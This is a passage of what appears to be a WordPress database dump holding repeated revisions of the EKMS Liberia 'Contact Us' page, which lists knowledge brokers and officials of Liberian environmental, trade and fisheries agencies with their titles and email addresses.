700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:30:27','2021-01-18 12:30:27','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3345,42,'2021-01-18 12:30:27','2021-01-18 12:30:27','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:30:27','2021-01-18 12:30:27','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3346,42,'2021-01-18 12:30:27','2021-01-18 12:30:27','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:30:27','2021-01-18 12:30:27','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3347,42,'2021-01-18 12:57:52','2021-01-18 12:57:52','','','','inherit','open','closed','','uriah','','','2021-01-18 12:58:09','2021-01-18 12:58:09','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png',0,'attachment','image/png',0),(3348,42,'2021-01-18 12:58:30','2021-01-18 12:58:30','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:58:30','2021-01-18 12:58:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3349,42,'2021-01-18 12:58:30','2021-01-18 12:58:30','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. 